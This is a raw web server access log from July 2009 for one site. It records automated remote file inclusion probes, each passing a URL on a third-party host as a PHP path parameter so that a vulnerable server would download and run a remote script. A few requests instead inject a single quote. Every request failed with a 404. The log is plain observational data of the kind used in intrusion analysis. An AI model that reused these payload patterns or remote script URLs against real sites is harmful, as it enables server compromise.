203.63.5.148 - - [04/Jul/2009:05:01:32 -0700] "GET /////include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:05:01:32 -0700] "GET /logs/access.log//////include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:05:01:32 -0700] "GET /logs//////include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.146.231.194 - - [04/Jul/2009:05:01:34 -0700] "GET /index.php?option=com_custompages&cpage=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:05:01:39 -0700] "GET /////include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:05:01:39 -0700] "GET /logs/access.log//////include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:05:01:39 -0700] "GET /logs//////include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:05:04:45 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:05:06:00 -0700] "GET /logs/access.log%20%20//////include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.63.5.148 - - [04/Jul/2009:05:06:06 -0700] "GET /logs/access.log%20%20//////include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:05:17:41 -0700] "GET /logs/access.log//////include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:05:17:41 -0700] "GET /logs//////include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:05:17:41 -0700] "GET /////include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:05:17:44 -0700] "GET /////include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:05:17:45 -0700] "GET /logs/access.log//////include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:05:17:45 -0700] "GET /logs//////include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:18:02 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:18:02 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:18:02 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:18:02 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:18:02 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:18:02 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.146.231.194 - - [04/Jul/2009:05:19:55 -0700] "GET /logs/access_090521.log/index.php?option=com_custompages&cpage=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
218.146.231.194 - - [04/Jul/2009:05:19:56 -0700] "GET /index.php?option=com_custompages&cpage=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
218.146.231.194 - - [04/Jul/2009:05:19:57 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:20:26 -0700] "GET /logs/access.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:20:33 -0700] "GET /logs/access.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.146.231.194 - - [04/Jul/2009:05:22:49 -0700] "GET /logs/access_090212.log/index.php?option=com_custompages&cpage=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:25:44 -0700] "GET /phphtml.php?htmlclass_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:25:45 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:25:45 -0700] "GET /phphtml.php?htmlclass_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:25:45 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:25:45 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:25:45 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
213.171.225.234 - - [04/Jul/2009:05:26:17 -0700] "GET /logs/access.log%22%20%20target=%22_blank//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.eyepro.net//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.171.225.234 - - [04/Jul/2009:05:26:17 -0700] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.eyepro.net//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.171.225.234 - - [04/Jul/2009:05:26:18 -0700] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.eyepro.net//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.171.225.234 - - [04/Jul/2009:05:26:18 -0700] "GET /logs/access.log//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.eyepro.net//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
91.149.157.130 - - [04/Jul/2009:05:29:42 -0700] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://fd.axl-jp.net//assets/export/v6-i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
91.149.157.130 - - [04/Jul/2009:05:29:42 -0700] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://fd.axl-jp.net//assets/export/v6-i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:05:31:05 -0700] "GET /logs/access.log//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:05:31:05 -0700] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:05:31:05 -0700] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
213.171.225.234 - - [04/Jul/2009:05:31:13 -0700] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.eyepro.net//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.171.225.234 - - [04/Jul/2009:05:31:14 -0700] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.eyepro.net//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:05:33:15 -0700] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:05:33:15 -0700] "GET /logs/access.log//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:05:33:15 -0700] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
216.117.128.143 - - [04/Jul/2009:05:34:11 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
216.117.128.143 - - [04/Jul/2009:05:34:11 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
216.117.128.143 - - [04/Jul/2009:05:34:11 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.70.32.2 - - [04/Jul/2009:05:34:56 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.70.32.2 - - [04/Jul/2009:05:34:56 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.70.32.2 - - [04/Jul/2009:05:34:56 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
212.158.167.98 - - [04/Jul/2009:05:36:44 -0700] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://fd.axl-jp.net//assets/export/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
212.158.167.98 - - [04/Jul/2009:05:36:44 -0700] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://fd.axl-jp.net//assets/export/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
212.158.167.98 - - [04/Jul/2009:05:36:44 -0700] "GET /logs/access.log//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://fd.axl-jp.net//assets/export/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
216.117.128.143 - - [04/Jul/2009:05:37:39 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:43:23 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:43:23 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:43:23 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:43:58 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:43:58 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:43:58 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
217.70.32.2 - - [04/Jul/2009:05:46:31 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:05:47:51 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:48:23 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:54:10 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:54:10 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:54:10 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:54:12 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:54:12 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:54:12 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:54:25 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:54:25 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:54:28 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:55:51 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:55:51 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:55:51 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:05:56:11 -0700] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:05:56:11 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:05:56:28 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:56:56 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:56:56 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:56:58 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:57:04 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:57:04 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:05:57:04 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:05:57:16 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
204.9.247.53 - - [04/Jul/2009:06:05:29 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
204.9.247.53 - - [04/Jul/2009:06:05:29 -0700] "GET /phphtml.php?htmlclass_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
204.9.247.53 - - [04/Jul/2009:06:05:30 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
204.9.247.53 - - [04/Jul/2009:06:05:55 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
204.9.247.53 - - [04/Jul/2009:06:05:55 -0700] "GET /phphtml.php?htmlclass_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
204.9.247.53 - - [04/Jul/2009:06:05:55 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:06:11:42 -0700] "GET /logs/access.log///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:06:11:43 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:06:11:43 -0700] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
201.232.54.48 - - [04/Jul/2009:06:13:14 -0700] "GET /galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
201.232.54.48 - - [04/Jul/2009:06:13:14 -0700] "GET /logs//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
201.232.54.48 - - [04/Jul/2009:06:13:14 -0700] "GET /logs/access.log//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:06:13:22 -0700] "GET /logs/access.log//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:06:13:22 -0700] "GET /logs//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:06:13:22 -0700] "GET /galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:06:13:22 -0700] "GET /galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:06:13:22 -0700] "GET /logs//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:06:13:22 -0700] "GET /logs/access.log//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:06:13:23 -0700] "GET /galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:06:13:23 -0700] "GET /logs//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:06:13:23 -0700] "GET /logs/access.log//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
201.232.54.48 - - [04/Jul/2009:06:14:44 -0700] "GET /logs/access.log%20%20//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:06:16:11 -0700] "GET /logs/access.log%20%20//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:06:16:21 -0700] "GET /logs/access.log%20%20//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:06:16:33 -0700] "GET /logs/access.log%20%20//galeria.php?start=0&kategoria=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.146.231.194 - - [04/Jul/2009:06:21:41 -0700] "GET /index.php?option=com_custompages&cpage=http://www.peb.com.ua/ua/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:06:23:00 -0700] "GET /logs/access.log/errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:06:23:00 -0700] "GET /logs/errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:06:23:00 -0700] "GET /errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:06:23:06 -0700] "GET /errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:06:23:07 -0700] "GET /logs/errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
